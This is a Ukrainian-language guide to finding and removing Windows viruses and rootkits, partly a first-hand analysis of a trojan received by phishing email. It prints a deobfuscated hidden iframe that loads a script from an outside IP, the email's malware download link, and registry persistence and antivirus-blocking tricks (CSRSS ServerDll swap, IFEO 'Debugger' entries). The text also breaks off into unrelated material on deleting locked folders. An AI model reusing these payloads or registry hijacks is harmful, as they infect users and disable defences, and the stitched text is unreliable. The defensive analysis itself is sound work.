Як видалити вірус із папки windows. Де ховаються віруси та як користуватися командою msconfig у Windows. Видаляємо тимчасові файли

Що робити, якщо антивірус не впорався зі своєю роботою.

    Ви, мабуть, неодноразово зустрічали інформацію у ЗМІ про те, що з'явився новий страшний вірус, який може призвести до нової страшної епідемії та мало не до кінця Інтернету. Або що з'явилася нова технологіявірусописи, заснована на використанні молодших бітів пікселів графічних зображень, і тіло вірусу практично неможливо виявити. Або... багато чого страшного. Іноді віруси наділяють мало не розумом та самосвідомістю. Відбувається це від того, що багато користувачів, заплутавшись у складної класифікаціїта подробиці механізму функціонування вірусів, забувають, що в першу чергу, будь-який вірус - це комп'ютерна програма, тобто. набір процесорних команд (інструкцій), оформлених певним чином. Неважливо, в якому вигляді існує цей набір (файл, скрипт, частина завантажувального сектора або групи секторів поза файловою системою) - набагато важливіше, щоб ця програма не змогла отримати управління, тобто. почати виконуватись. Записаний на ваш жорсткий диск, але вірус, що не запустився, також нешкідливий, як і будь-який інший файл. Головне завдання у боротьбі з вірусами – не виявити тіло вірусу, а запобігти можливості його запуску. Тому грамотні виробники вірусів постійно вдосконалюють як технології занесення шкідливого програмного забезпечення в систему, а й способи потайного запуску і функціонування.

Як зараження комп'ютера шкідливим програмним забезпеченням (вірусом)? Відповідь очевидна - має бути запущена якась програма. Ідеально – з адміністративними правами, бажано – без відома користувача та непомітно для нього. Способи запуску постійно вдосконалюються та засновані, не тільки на прямому обмані, але й на особливостях чи недоліках операційної системи чи прикладного програмного забезпечення. Наприклад, використання можливості автозапуску для змінних носіїв у середовищі операційних системСімейство Windows призвело до поширення вірусів на флеш-дисках. Функції автозапуску зазвичай викликаються зі змінного носія або із загальних мережевих папок. При автозапуску обробляється файл Autorun.inf. Цей файл визначає, які команди виконує система. Багато компаній використовують цю функцію для запуску інсталяторів своїх програмних продуктівПроте її ж стали використовувати і виробники вірусів. В результаті, про автозапуск, як деяку зручність при роботі за комп'ютером, можна забути. - більшість грамотних користувачів цю опцію відключили назавжди.

Для відключення функцій автозапуску у Windows XP/2000 reg-файл для імпорту до Реєстру.

Для Windows 7 і пізніших вимкнення автозапуску можна виконати з використанням аплету "Автозапуск" панелі керування. У цьому випадку відключення діє по відношенню до поточного користувача. Більш надійним способом захисту від застосування вірусів, що переносяться на знімних пристроях, є блокування автозапуску для всіх користувачів за допомогою групових політик:

запустити редактор групових політик gpedit.msc

перейти до "Конфігурація комп'ютера" - - " Конфігурація Windows- - "Адміністративні шаблони" - " Компоненти Windows- "Політика автозапуску".

встановити значення "Увімк." для компонента "Вимкнути автозапуск"

    Але основним "постачальником" вірусів, безсумнівно, є Інтернет і як основне прикладне програмне забезпечення- "Оглядач Інтернету" (браузер). Сайти стають все складнішими і красивішими, з'являються нові мультимедійні можливості, зростають соціальні мережі, постійно збільшується кількість серверів і зростає кількість їх відвідувачів. Оглядач Інтернету поступово перетворюється на складний програмний комплекс – інтерпретатор даних, отриманих ззовні. Іншими словами, - до програмного комплексу, який виконує програми на підставі невідомого вмісту. Розробники оглядачів (браузерів) постійно працюють над підвищенням безпеки своїх продуктів, проте виробники вірусів теж не стоять на місці, і ймовірність зараження системи шкідливим програмним забезпеченням залишається досить високою. Існує думка, що якщо не відвідувати "сайти для дорослих", сайти з серійними номерамипрограмних продуктів та ін. то можна уникнути зараження. Це не зовсім так. В Інтернеті чимало зламаних сайтів, власники яких навіть не підозрюють про зло. І давно минули ті часи, коли зломщики тішили своє самолюбство заміною сторінок (дефейсом). Зараз подібний злом зазвичай супроводжується впровадженням у сторінки цілком добропорядного сайту, спеціального коду для зараження комп'ютера відвідувача. Крім того, виробники вірусів використовують найпопулярніші пошукові запити для відображення заражених сторінок у результатах видачі пошукових систем. Особливо популярні запити з фразами "завантажити безкоштовно" та "завантажити без реєстрації та SMS". Намагайтеся не використовувати ці слова в пошукових запитах, інакше ризик отримання посилання на шкідливі сайти значно зростає. Особливо якщо ви шукаєте популярний фільм, який ще не вийшов у прокат або останній концерт найвідомішої групи.

    Механізм зараження комп'ютера відвідувача сайту в спрощеному вигляді я спробую пояснити на прикладі. Не так давно, при відвідуванні одного досить популярного сайту, я отримав повідомлення програми моніторингу автозапуску (PT Startup Monitor) про те, що додаток rsvc.exeнамагається виконати запис до Реєстру. Програма була благополучно прибита FAR"ом, а зміни в реєстрі скасовані PT Startup Monitor"ом. Аналіз сторінок сайту показав наявність дивного коду мовою Javascript, що виконує операції з перетворення рядкових даних, які не є осмисленим текстом. Мова Javascriptпідтримується більшістю сучасних браузерів та використовується практично на всіх веб-сторінках. Сценарій, що завантажується з таких сторінок, виконується браузером Інтернету. Внаслідок численних перетворень згаданих вище рядків виходив досить простий код:

iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

Що означає виконання CGI-сценарію сервера з IP-адресою 91.142.64.91 (що не має жодного відношення до відвідуваного сайту) в окремому вікні (тег iframe) розміром 1 піксель за шириною та 1 піксель за висотою, у невидимому вікні. Результат – цілком ймовірне вірусне зараження. Особливо якщо немає антивірусу або він не зреагує на загрозу. Цей прикладприхованого перенаправлення відвідувача на шкідливий сайт з використанням тега "iframe" сьогодні, напевно, не дуже актуальний, але цілком демонструє як, відвідуючи легальний сайт, можна непомітно для себе побувати і на іншому, не дуже легальному, навіть не підозрюючи про це. На жаль, абсолютної гарантії від вірусного зараження немає і потрібно бути готовим до того, що з вірусом доведеться справлятися власними силами.

    В Останнім часом, Одним з основних напрямків розвитку шкідливих програм стало застосування в них усіляких способів захисту від виявлення антивірусними засобами – так звані руткіти (rootkit) – технології. Такі програми часто або виявляються антивірусами або не видаляються ними. У цій статті я спробую описати більш-менш універсальну методику виявлення та видалення шкідливого програмного забезпечення із зараженої системи.

    Видалення "якісного" вірусу стає все більш нетривіальним завданням, оскільки такий вірус розробники забезпечують властивостями, що максимально ускладнюють її вирішення. Нерідко вірус може працювати в режимі ядра (kernel mode) та має необмежені можливості щодо перехоплення та модифікації системних функцій. Іншими словами - вірус може приховати від користувача (і антивірусу) свої файли, ключі реєстру, мережеві з'єднання, - все, що може бути ознакою його наявності у зараженій системі. Він може обійти будь-який брандмауер, системи виявлення вторгнення та аналізатори протоколів. І, крім усього іншого, він може працювати і в безпечному режимі завантаження Windows. Іншими словами, сучасну шкідливу програму дуже непросто виявити та знешкодити.

Розвиток антивірусів теж не стоїть на місці, - вони постійно вдосконалюються, і в більшості випадків, зможуть виявити і знешкодити шкідливе ПЗ, але рано чи пізно, знайдеться модифікація вірусу, яка якийсь час буде "не по зубах" будь-якому антивірусу. Тому самостійне виявлення та видалення вірусу - це робота, яку рано чи пізно доведеться виконувати будь-якому користувачеві комп'ютера.

Добрий день.
Нас зацікавила ваша кандидатура, але пропонуємо вам заповнити
наш фірмовий бланк резюме та надіслати його за адресою [email protected]
Відповідь не гарантується, але якщо Ваше резюме нас зацікавить, ми
зателефонуємо Вам протягом кількох днів. Не забудьте
вказати телефон, а також позицію, на яку Ви претендуєте. Бажано
також вказати побажання щодо окладу.
Наш фірмовий бланк ви можете завантажити за посиланням нижче.
http://verano-konwektor.pl/resume.exe

    Аналіз заголовків листа показав, що його було відправлено з комп'ютера до Бразилії через сервер, що у США. А фірмовий бланк пропонується завантажити із сервера у Польщі. І це з російськомовним змістом.

nbsp   Ясна річ, що ніякого фірмового бланка ви не побачите, і швидше за все, отримаєте троянську програму на свій комп'ютер.
    Завантажую файл resume.exe. Розмір – 159744 байта. Поки що не запускаю.
    Копіюю файл на інші комп'ютери, де встановлені різні антивіруси - просто для чергової перевірки їх ефективності. Результати не дуже - антивірус Avast 4.8 Home Edition делікатно промовчав. Підсунув його Symantec" - та ж реакція. Спрацював тільки AVG 7.5 Free Edition. Схоже, цей антивірус, насправді, не дарма набирає популярності.
    Усі експерименти виконую на віртуальній машиніз операційною системою Windows XP. Обліковий записз правами адміністратора, оскільки найчастіше віруси успішно впроваджуються в систему лише, якщо користувач є локальним адміністратором.
    Запускаю. Через якийсь час заражений файл зник, схоже, вірус розпочав свою чорну справу.
    Поведінка системи зовні не змінилася. Очевидно, потрібне перезавантаження. Про всяк випадок, забороняю в брандмауері з'єднання протоколу TCP. Залишаю дозволеними тільки вихідні з'єднання по UDP:53 (DNS) - треба залишити вірусу хоч якусь можливість проявити свою активність. Як правило, після впровадження вірус повинен зв'язатися з господарем або із заданим сервером в інтернеті, ознакою чого будуть DNS-запити. Хоча, знову ж таки, у світлі сказаного вище, розумний вірус може їх замаскувати, крім того, він може обійти брандмауер. Забігаючи вперед, скажу, що в даному конкретному випадку цього не сталося, але для надійного аналізу мережної активності весь трафік зараженої машини краще пустити через іншу, незаражену, де можна бути впевненим, що правила брандмауера виконуються, а аналізатор трафіку (я користувався Wireshark" ) видає те, що є насправді.
    Перезавантажуюсь. Зовні нічого не змінилося, окрім того, що неможливо вийти в інтернет, оскільки я сам відключив таку можливість. Ні в шляхах автозапуску, ні в службах, ні в системних каталогах нічого нового. Перегляд системного журналу дає лише одне наведення - системі не вдалося запустити таємничу службу grande48. Такої служби в мене бути не могло, та й за часом ця подія збіглася з моментом застосування. Що ще наводить на думку про успішне впровадження - так це відсутність у реєстрі запису про службу grande48 та відсутність другого повідомлення в журналі системи про помилку запуску служби після перезавантаження. Це, швидше за все, деякий недоопрацювання вірусописувачів. Хоча й несуттєва, адже більшість користувачів журнал подій не переглядають, та й на момент виникнення підозри на зараження цей запис у журналі вже може бути відсутнім.

Визначаємо наявність вірусу у системі.

1.     Напевно має бути "лівий" трафік. Визначити можна з допомогою аналізаторів протоколу. Я використав Wireshark. Відразу після завантаження першим запускаю його. Все правильно, є наявність групи DNS-запитів (як потім виявилось – один раз за 5 хвилин) на визначення IP-адрес вузлів ysiqiyp.com, irgfqfyu.com, updpqpqr.com тощо. Взагалі всі ОС Windows люблять виходити в мережу, коли треба і не треба, антивіруси можуть оновлювати свої бази, тому визначити приналежність трафіку саме вірусу досить важко. Зазвичай потрібно пропустити трафік через незаражену машину та серйозно проаналізувати його вміст. Але це окрема тема. В принципі, непрямою ознакою ненормальності мережної активності системи можуть бути значні значення лічильників трафіку провайдера, в умовах простою системи, лічильники з властивостей VPN-з'єднання тощо.

2.     Спробуємо використовувати програми для пошуку руткітів. Наразі таких програм вже чимало і їх нескладно знайти у мережі. Одна з найпопулярніших - Марка Руссиновича, яку можна завантажити на сторінці розділу Windows Sysinternals сайту Microsoft. Інсталяція не потрібна. Розархівуємо та запускаємо. Тиснемо "Scan". Після нетривалого сканування бачимо результати:

    До речі, навіть не вникаючи у зміст рядків, можна відразу помітити, що є дуже "свіжі" за часом створення/модифікації запису або файли (колонка "Timestamp"). Нас насамперед мають зацікавити файли з описом (колонка "Description") - "Hidden from Windows API"- приховано від API-інтерфейсу Windows. Приховування файлів, записів у реєстрі, додатків – це, звичайно, ненормально. Два файли - grande48.sys і Yoy46.sys - це саме те, що ми шукаємо. Це і є шуканий руткіт, що прописався під виглядом драйверів, або його частина, що забезпечує скритність. Наявність у списку решти була для мене сюрпризом. Перевірка показала – це нормальні драйвери Windows XP. Крім того, вірус приховував їх наявність лише у папці \system32 , а їх копії в \system32\dllcache залишилися видимими.
    Нагадаю, що у Windows XP застосовується спеціальний механізм захисту системних файлів, званий Windows File Protection (WFP). Завдання WFP - автоматичне відновлення важливих системних файлівпри їх видаленні чи заміні застарілими чи непідписаними копіями. Усі системні файли Windows XP мають цифровий підпис і перераховані у спеціальній базі даних, що використовується WFP. Для збереження копій файлів використовується папка \system32\dllcache і, частково, \Windows\driver cache . При видаленні або заміні одного із системних файлів, WFP автоматично копіює "правильну" його копію з папки \dllcache. Якщо вказаний файлвідсутній в папці \dllcache, то Windows XP просить вставити в привод компакт-дисків інсталяційний компакт-диск Windows XP. Спробуйте видалити vga.sys із \system32, і система відразу його відновить, використовуючи копію з dllcache. А ситуація, коли, при працюючій системі відновлення файлів, файл драйвера є в \dllcache і його не видно в \system32 - це теж додаткова ознака наявності руткіта в системі.

Видаляємо вірус із системи.

    Залишилося виконати найважливішу дію – видалити вірус. Найпростіший і надійніший спосіб - завантажитися в іншій, незараженій операційній системі та заборонити старт драйверів руткіту.

Скористаємося стандартною консоллю відновлення Windows. Беремо інсталяційний диск Windows XP і завантажуємося з нього. На першому екрані вибираємо 2-й пункт меню – тиснемо R.

Вибираємо систему (якщо їх кілька):

Вводимо пароль адміністратора.
Список драйверів та служб можна переглянути за допомогою команди listsvc:

Справді, у списку є Yoy46 , правда відсутня grande48, що говорить про те, що файл драйвера grande48.sys присутня в системі, але не завантажується:

Консоль відновлення дозволяє забороняти або дозволяти запуск драйверів та служб за допомогою команд disableі enable. Забороняємо старт Yoy46 командою:

    Водимо команду EXIT і система йде на перезавантаження.
Після перезавантаження драйвер руткіта не буде завантажено, що дозволить легко видалити його файли та очистити реєстр від його записів. Можна зробити це вручну, а можна використовувати якийсь антивірус. Найбільш ефективним, на мою думку, буде безкоштовний сканер на основі всім відомого антивірусу Dr.Web Ігоря Данилова. Завантажити можна звідси - http://freedrweb.ru
    Там же можна завантажити "Dr.Web LiveCD" - образ диска, який дозволяє відновити працездатність системи, ураженої діями вірусів, на робочих станціях та серверах під керуванням Windows\Unix, скопіювати важливу інформацію на змінні носії або інший комп'ютер, якщо дії шкідливих програм унеможливили завантаження комп'ютера. Dr.Web LiveCD допоможе не тільки очистити комп'ютер від інфікованих та підозрілих файлів, але й спробує вилікувати заражені об'єкти. Для видалення вірусу потрібно завантажити з сайту DrWeb образ (файл із розширенням.iso) та записати його на CD. Буде створено завантажувальний диск, завантажившись з якого, керуєтеся простим та зрозумілим меню.

    Якщо з будь-яких причин немає можливості скористатися Dr.Web LiveCD, можна спробувати антивірусний сканер Dr.Web CureIt!, який можна запустити, завантажившись в іншій ОС, наприклад, з використанням Winternals ERD Commander. Для сканування зараженої системи необхідно вказати саме жорсткий диск (Режим "Вибіркова перевірка"). Сканер допоможе вам знайти файли вірусу, і залишиться лише видалити пов'язані з ним записи з реєстру.
    Оскільки віруси навчилися прописуватися на запуск у безпечному режимі завантаження, не заважає перевірити гілку реєстру:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot
Розділи:
Minimal- список драйверів та служб, що запускаються в безпечному режимі (Safe Mode)
Network- те саме, але з підтримкою мережі.

Додам, що існує новий клас rootkit, представником якого є BackDoor.MaosBoot, що з'явився наприкінці 2007р. Ця троянська програма прописує себе у завантажувальний сектор жорсткого дискаі забезпечує приховане встановлення свого драйвера в пам'яті. Сам Rootkit-драйвер безпосередньо записаний в останні сектори фізичного диска, минаючи файлову системучим і приховує свою присутність на диску Загалом принцип не новий, років десять тому шкідливі програми подібним чином маскувались на резервних доріжках дискет і жорстких дисківПроте виявився дуже ефективним, оскільки більшість антивірусів із завданням видалення BackDoor.MaosBoot досі не справляються. Згадуваний вище завантажувальний сектор не перевіряє, а сектори наприкінці диска для нього ніяк не пов'язані з файловою системою і, звичайно, такий руткіт він не виявить. Правда, Dr.Web (а, отже, і Cureit) із BackDoor.MaosBoot цілком справляється.

    Якщо у вас виникли сумніви щодо будь-якого файлу, то можна скористатися безкоштовною онлайновою антивірусною службою virustotal.com. Через спеціальну форму на головній сторінцісайту закачуєте підозрілий файл та чекаєте на результати. Сервісом virustotal використовуються консольні версії безлічі антивірусів для перевірки вашого підозрюваного файлу. Результати відображаються на екрані. Якщо файл є шкідливим, то з великою ймовірністю, ви зможете це визначити. Певною мірою сервіс можна використовувати для вибору "кращого антивірусу".
посилання на одну з гілок форуму сайту virusinfo.info, де користувачі викладають посилання на різні ресурси, присвячені антивірусний захист, в т.ч. та онлайн - перевірок комп'ютера, браузера, файлів...

    Іноді, в результаті некоректних дійвірусу (або антивірусу) система взагалі перестає завантажуватись. Наведу характерний приклад. Шкідливі програми намагаються впровадитися у систему, використовуючи різні, зокрема, досить незвичайні методи. У процесі початкового завантаження, ще до реєстрації користувача, запускається "Диспетчер сеансів" (SystemRootSystem32smss.exe) , завдання якого - запустити високорівневі підсистеми і сервіси (служби) операційної системи. На цьому етапі запускаються процеси CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), і служби, що залишилися з параметром Start=2 з розділу реєстру

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services

    Інформація, призначена для диспетчера сеансів, знаходиться у ключі реєстру

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager

Одним із способів впровадження в систему є заміна dll-файлу для CSRSS. Якщо ви подивитеся вміст запису

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems

То знайдете значення

ServerDll=basesrv, ServerDll=winsrv. Бібліотеки basesrv.dll та winsrv.dll - це "правильні" файли системи, що завантажуються службою CSRSS на звичайній (незараженій) системі. Цей запис у реєстрі можна підправити на запис, який забезпечує завантаження, наприклад, замість basesrv.dll, шкідливий basepvllk32.dll:

ServerDll=basepvllk32 (або будь-яку іншу dll, відмінну від basesrv і winsrv)

Що забезпечить при наступному перезавантаженні отримання управління шкідливою програмою. Якщо ж ваш антивірус виявить і видалить впроваджену basepvllk32, залишивши недоторканий запис у реєстрі, то завантаження системи завершиться "синім екраном смерті" (BSOD) з помилкою STOP c000135 та повідомлення про неможливість завантажити basepvllk32.

Виправити ситуацію можна так:

Завантажиться в консоль відновлення (або в будь-якій іншій системі), і скопіювати файл basesrv.dll з папки C:WINDOWS\system32 в ту ж папку під ім'ям basepvllk32.dll. Після цього система завантажиться і можна буде вручну підправити запис у реєстрі.
- завантажитись з використанням Winternals ERD Commander та виправити запис у реєстрі на ServerDll=basesrv. Або виконати відкат системи за допомогою точки відновлення.

    Ще один характерний приклад. Шкідлива програма реєструється як налагоджувач процесу explorer.exe, створюючи в реєстрі запис типу:

"Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
Вилучення wuauclt.exe антивірусом без видалення запису в реєстрі призводить до неможливості запуску explorer.exe. В результаті ви отримуєте порожній робочий стіл, без будь-яких кнопок та ярликів. Вийти з положення можна за допомогою комбінації клавіш CTRL-ALT-DEL. Вибираєте "Диспетчер задач" - "Нове завдання" - "Огляд" - знаходьте та запускаєте редактор реєстру regedit.exe. Потім видаляєте ключ
HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
та перезавантажуєтесь.

    У випадку, коли ви точно знаєте час зараження системи, відкат на точку відновлення до цієї події є досить надійним способом позбавлення від зарази. Іноді є сенс виконувати не повний відкат, а частковий з відновленням файлу реєстру SYSTEM, як це описано в статті "Проблеми із завантаженням ОС" розділу "Windows"

    == Травень 2008. ==

Доповнення

    Цей додаток виник через рік після написання основної статті. Тут я вирішив розмістити найцікавіші рішення, що виникли у процесі боротьби зі шкідливим програмним забезпеченням. Щось на кшталт коротких нотаток.

Після видалення вірусу жоден антивірус не працює.

    Випадок цікавий тим, що спосіб блокування антивірусного програмного забезпечення можна використовувати і в боротьбі з файлами вірусів, що виконуються. Почалося все з того, що після вилучення досить примітивного вірусу не запрацював ліцензійний "Стрім Антивірус". Переустановки з чищенням реєстру не допомогли. Спроба встановлення Avira Antivir Personal Free закінчилася успішно, але антивірус не запустився. У системному журналі було повідомлення про таймаут під час запуску служби "Avira Antivir Guard". Перезапуск вручну закінчувався тією самою помилкою. Причому жодних зайвих процесів у системі не виконувалося. Була стовідсоткова впевненість – вірусів, руткітів та іншої гидоти (Malware) у системі немає.
    У якийсь момент спробував запустити антивірусну утиліту AVZ. Принцип роботи AVZ багато в чому заснований на пошуку в системі різноманітних аномалій, що вивчається. З одного боку, це допомагає в пошуку Malware, але з іншого цілком закономірні підозри до компонентів антивірусів, антишпигунів та іншого легітимного ПЗ, що активно взаємодіє із системою. Для придушення реагування AVZ на легітимні об'єкти та спрощення аналізу результатів перевірки системи за рахунок позначки легітимних об'єктів кольором та їх фільтрації з логів застосовується база безпечних файлів AVZ. З недавнього часу запущено повністю автоматичний сервіс, що дозволяє всім бажаючим надіслати файли для поповнення цієї бази.
Але: виконуваний файл avz.exe не запустився! Перейменовую avz.exe в musor.exe - все чудово запускається. В черговий раз AVZ виявився незамінним помічником у вирішенні проблеми. При виконанні перевірок у результатах з'явились рядки:

Небезпечно - налагоджувач процесу "avz.exe"="ntsd-d"
Небезпечно - налагоджувач процесу "avguard.exe"="ntsd-d"
:.

То була вже серйозна зачіпка. Пошук у реєстрі за контекстом "avz" призвів до виявлення у гілці

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

Розділу з ім'ям avz.exe, що містить рядковий параметр з ім'ям "Debugger"та значенням .
І, як з'ясувалося пізніше, у зазначеній гілці був присутній не тільки розділ "avz.exe", але й розділи з іменами модулів, що виконуються практично всіх відомих антивірусів і деяких утиліт моніторингу системи. Сам ntsd.exe - цілком легальний налагоджувач Windows, стандартно присутній у всіх версіях ОС, але подібний запис у реєстрі призводить до неможливості запуску програми, ім'я файлу якого збігається з ім'ям розділу???.exe.

    Після видалення з реєстру всіх розділів, з іменем ???.exe і які містять запис "Debugger" = "ntsd -d", працездатність системи повністю відновилася.

В результаті аналізу ситуації з використанням параметра "ntsd -d" для блокування запуску виконуваних файлів, з'явилася думка використовувати цей прийом для боротьби з самими вірусами. Звичайно, це не панацея, але певною мірою може знизити загрозу зараження комп'ютера вірусами з відомими іменами виконуваних файлів. Щоб у системі неможливо було виконати файли з іменами ntos.exe, file.exe, system32.exe і т.п. можна створити reg-файл для імпорту до Реєстру:

Windows Registry Editor Version 5.00

"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
:.. і т.д.

Зверніть увагу, що ім'я розділу не містить шляхи файлу, тому цей спосіб не можна застосовувати для файлів вірусів, імена яких збігаються з іменами легальних виконуваних файлів, але самі файли нестандартно розміщені у файловій системі. Наприклад, провідник Explorer.exe знаходиться в папці \WINDOWS\, а вірус розташовується десь в іншому місці - в корені диска, в папці \temp, \windows\system32\ Якщо ви створите розділ з ім'ям "Explorer.exe" - то після входу в систему ви отримаєте порожній робочий стіл, оскільки провідник не запуститься. Найгірше, якщо ви створите розділ, ім'я якого збігається з ім'ям системної служби (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то отримаєте систему, що впала. Якщо вірус знаходиться в C:\temp\winlogon.exe, а легальний модуль входу в систему C:\WINDOWS\SYSTEM32\winlogon.exe, створення розділу з ім'ям winlogon.exe призведе до неможливості запуску служби winlogon та краху системи з синім екраном смерті (BSOD).

    Але, все ж таки, сподіватися на те, що код, що запитується вірусом, підійде в кожному конкретному випадку, не варто. Як не варто сподіватися на чесне самознищення вірусу, і тим більше не варто відправляти СМС. Будь-який вірус можна видалити, навіть якщо він не є антивірусами. Методики видалення вірусу-здирника нічим не відрізняються від методик видалення будь-якого іншого шкідливого ПЗ, з одним, мабуть, відзнакою - не варто витрачати час на спроби впоратися з поганою серед зараженої системи, хіба що для розвитку власних навичок і поповнення знань.

Найбільш простий і ефективний шлях - завантажитися з використанням іншої, незараженої системи і, підключившись до зараженої, видалити файли вірусу та виправити записи в реєстрі. Про це я вже писав вище, в основному статті, а тут спробую просто викласти кілька коротких варіантів видалення вірусу.

Використання Dr.Web LiveCD - найпростіший спосіб, що не вимагає спеціальних знань. Завантажуєте iso-образ CD, записуєте його на болванку, завантажуєтеся з CD-ROM і запускаєте сканер.

Використання Winternals ERD Commander. Завантажуєтеся з нього, підключившись до зараженої системи, та виконуєте відкат на контрольну точку відновлення з датою, коли зараження ще не було. Вибираєте меню System Tools - System Restore. Якщо відкат засобами ERD Commander"а виконати неможливо, спробуйте вручну знайти файли реєстру в даних контрольних точок і відновити їх у каталог Windows. Як це зробити я докладно описав у статті "Робота з реєстром".

Завантаження в іншій ОС та ручне видалення вірусу. Найскладніший, але найефективніший спосіб. В якості іншої ОС найзручніше використовувати той же ERD Commander. Методика виявлення та видалення вірусу може бути наступною:

Перейдіть на диск зараженої системи і переглядаєте системні каталоги на наявність файлів і файлів драйверів, що виконуються, з датою створення близькою до дати зараження. Переміщаєте ці файли до окремої папки. Зверніть увагу на каталоги

\Windows
\Windows\system32
\Windows\system32\drivers
\Windows\Tasks\
\RECYCLER
\System Volume Information
Каталоги користувачів \Documents And Settings\All Usersі \Documents And Settings\ім'я користувача

Дуже зручно використовувати для пошуку таких файлів FAR Manager, з увімкненим сортуванням за датою для панелі, де відображається вміст каталогу (комбінація CTRL-F5). Особливу увагу варто звернути на приховані файли, що виконуються. Існує також ефективна та проста утиліта від Nirsoft – SearchMyFiles, застосування якої дозволяє, в переважній більшості випадків, легко виявити шкідливі файли навіть без використання антивірусу. Спосіб виявлення шкідливих файлів за часом створення (Creation time)

Підключаєтеся до реєстру зараженої системи та шукаєте посилання на імена цих файлів. Сам реєстр не заважає попередньо скопіювати (повністю або принаймні ті частини, де зустрічаються вище зазначені посилання). Самі посилання видаляєте чи змінюєте у яких імена файлів інші, наприклад - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.

Цей спосібне вимагає особливих знань і у випадках, коли вірус не змінює дату модифікації своїх файлів (а це поки що зустрічається дуже рідко) - дає позитивний ефект. Навіть якщо вірус не є антивірусами.

Якщо попередні методики не дали результату, залишається одне – ручний пошук можливих варіантівзапуску вірусу. У меню Administrative Tools ERD Commander"а є пункти:

Autoruns- інформація про параметри запуску програм та оболонку користувача.
Service and Driver Manager- інформація про служби та драйвери системи.

- Як продовження теми – як позбутися вірусів за допомогою стандартних засобів операційної системи Windows Vista\ Windows 7. Використання безпечного режиму за допомогою командного рядка.

Використання завантажувального диска Winternals ERD Commander- Детальна інструкція із застосування диска аварійного відновлення системи, створеного на базі Microsoft Diagnostic and Recovery Toolset (MS DaRT).

Сайт Олега Зайцева, автора AVZ.- присвячений інформаційній безпеці, і зокрема - застосуванню однієї з найефективніших антивірусних утиліт AVZ.

Відновлення системи після вірусного зараженняЯк відновити працездатність Windows після видалення вірусу, який пошкодив деякі налаштування. Допомагає у випадках, коли не запускаються програми, при заміні сторінок, що відкриваються браузером, підміні домашньої сторінки, сторінки пошуку, при зміні налаштувань робочого столу, неможливості запуску редактора реєстру, відсутності доступу до Інтернету, недоступності деяких сайтів тощо.

Першою ознакою зараження вашого персонального комп'ютера(ноутбука, телефону або планшета), є як правило уповільнення продуктивності (раніше все літало), а також поява інших "дивних" проблем.

Зараження вірусом або шпигунською програмоюможе статися навіть при встановленому антивірусі.

Іноді буває, що дивна поведінка комп'ютера є результатом апаратних проблем (жорсткого диска, пам'яті) або конфліктом програм, драйверів, але завжди краще заздалегідь (поки завантажується Windows) перевірити комп'ютер на наявність шкідливого ПЗ.

Перш ніж щось робити, краще відключити комп'ютер від Інтернету і не підключати його, доки не буде повної впевненості в очищенні Вашого комп'ютера. Можливо, це допоможе запобігти поширенню шкідливого ПЗ та ваших особистих даних.

І так, виконуючи це покрокове керівництво для початківців, Ви самостійно очистите комп'ютер від вірусів та будь-якого іншого шкідливого ПЗ.

Крок 1: Завантажтеся у “Безпечний режим” Windows

Безпечний режим Windows – це режим, в якому завантажуються лише мінімально необхідні програмита служби.

Як правило, віруси запускаються автоматично при старті Windows, тому використовуючи безпечний режим, Ви автоматично запобігаєте їх запуску.

1. Щоб запустити безпечний режим Windows XP/7, вимкніть комп'ютер, потім увімкніть і постійно натискайте клавішу F8, до появи меню безпечного режиму.

Для запуску 8/10 натисніть кнопку « Пускпотім Вимкнення», потім натисніть та утримуйте клавішу Shift, а потім "".

2. Комп'ютер завантажиться в середовище відновлення Windows 10, виберіть “ Пошук та усунення несправностей – Додаткові параметри – Параметри завантаженнята натисніть кнопку Перезавантажити”.

3. У параметрах завантаження натисніть клавішу F4і комп'ютер розпочне завантаження у Безпечний режим Windows 10.

Зверніть увагу:Якщо ви хочете підключитися до Інтернету, то потрібно натиснути клавішу F5, яка включить безпечний режим з підтримкою мережевих драйверів.

Не дивуйтеся, якщо ваш комп'ютер працює набагато швидше в безпечному режимі, можливо це ознака того, що ваша система заражена шкідливими програмамиа можливо, просто дуже, дуже багато програм автоматично завантажуються при старті Windows.

Крок 2. Видалити тимчасові файли Windows

Видалити і ви можете пропустити цей крок. Але можливе видалення та очищення Windows, трохи прискорить надалі сканування системи антивірусом і навіть допоможе позбавитися деяких шкідливих програм.

Якщо ви не знаєте як видалити папку, яка не видаляється, то наш матеріал допоможе вам у цьому розібратися.

Кожен періодично має справу з "не видаляються" папками на ПК.

Звинувачувати в цьому когось безглуздо, навіть систему, яка стверджує нам, що дана директорія в Наразічасу зайнята будь-яким процесом.

Як результат – усі маніпуляції з ліквідації закінчуються фіаско. Підбираємось до основної теми: як видалити папку, яка не видаляється на windows 7 (win8)?

Існує 5 варіантів вирішення проблеми:

Перевірка системи;

Віруси;

Налаштування папки;

Сторонні утиліти.

Спробуємо розібратися із ситуацією.

Перезавантаження

Отже, ви маєте намір видалити злощасну директорію, але система стверджує, що вона не може це зробити з тих чи інших причин. Основна причина – використання файлів у папці будь-яким додатком або процесом, запущеним на даний момент.

На прикладі видно, що ліквідувати папку «скрини» не виходить, оскільки один або кілька файлів зараз застосовуються однією з програм Windows. Оскільки більшість не знає, якою саме, то їм нічого не залишається, окрім як перезапустити машину.

Тиснемо «Пуск» (1), потім клацаємо по невеликому квадрату (2) біля кнопки «завершення роботи». Вибираємо пункт із перезавантаженням (3).

Перевірка системи

Якщо ви не хочете робити рестарт, а вирішили докопатися до істини, перевірте, чи не знаходиться в папці програма, запущена в даний момент.

Припустимо, ви вирішили позбутися Skype з якоїсь причини, тільки не шляхом деінсталяції, а варварським видаленням папки, в якій знаходиться весь вміст програми. Розглянемо цей варіант.

Для початку відкриємо папку. Прямуємо по дорозі: Диск С – Programm Files – Skype.

Бачимо ось таку картину.

